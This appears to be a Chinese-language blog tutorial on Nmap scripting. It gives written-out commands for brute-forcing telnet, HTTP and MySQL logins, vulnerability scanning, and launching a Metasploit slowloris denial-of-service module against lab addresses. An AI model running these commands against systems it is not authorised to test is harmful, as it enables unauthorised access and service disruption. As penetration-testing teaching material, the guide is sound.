Nmap脚本使用指南

关于Nmap的教程，在前面的文章中写到过很多次了。通常情况下，我们是直接用Nmap扫描端口，然后再通过msf nessus进行漏洞扫描利用。所以整个过程比较繁琐，那么我们就要有必要认识一下Nmap的扩展脚本了！

nmap --script

Nmap的脚本位置：/usr/share/nmap/scripts/
查看脚本的数量

ls /usr/share/nmap/scripts/ | wc -l

可以看到，目前有605个，当然这些插件我们可以自己编写，也可以去下载。总之很方便的。

nmap脚本主要分为以下几类，在扫描时可根据需要设置-–script=类别这种方式进行比较笼统的扫描：

常用示例

检查弱口令

nmap --script=auth 192.168.123.1

暴力破解

可对mysql http smtp等常见协议进行暴力破解。

nmap --script=brute 192.168.123.1

如下，我们通过暴力破解，得到了telent的登录密码为admin

尝试登录

默认脚本扫描

默认的脚本扫描，主要是搜集各种应用服务的信息，收集到后，可再针对具体服务进行攻击。

nmap --script=default 192.168.123.1
或者 
nmap -sC 192.168.123.1

检查是否存在常见漏洞

nmap --script=vuln  192.168.123.1

扫描得到，目标可能存在CVE:CVE-2007-6750漏洞

漏洞利用

在msf中搜索此漏洞，配置相关信息即可！

search CVE-2007-6750
use auxiliary/dos/http/slowloris
show options
set rhost 192.168.123.1
run

whois解析

我们对论坛地址bbskali.cn进行历史解析查询。

nmap --script external bbskali.cn

如下我们得到了很多有用的信息：

HTTP认证爆破

nmap --script=http-brute 192.168.123.1

同样，我们这里以路由器的登录密码为破解对象，破解得到账号和密码为admin
注意：Nmap默认字典位置为：/usr/share/nmap/nselib/data

网站目录扫描

类似于御剑那样，nmap也同样可对网站目录进行扫描。

nmap --script=http-ls bbskali.cn

mysql相关

#破解root密码
nmap -p3306 --script=mysql-empty-password.nse 192.168.123.129 
#列出mysql用户
nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.123.129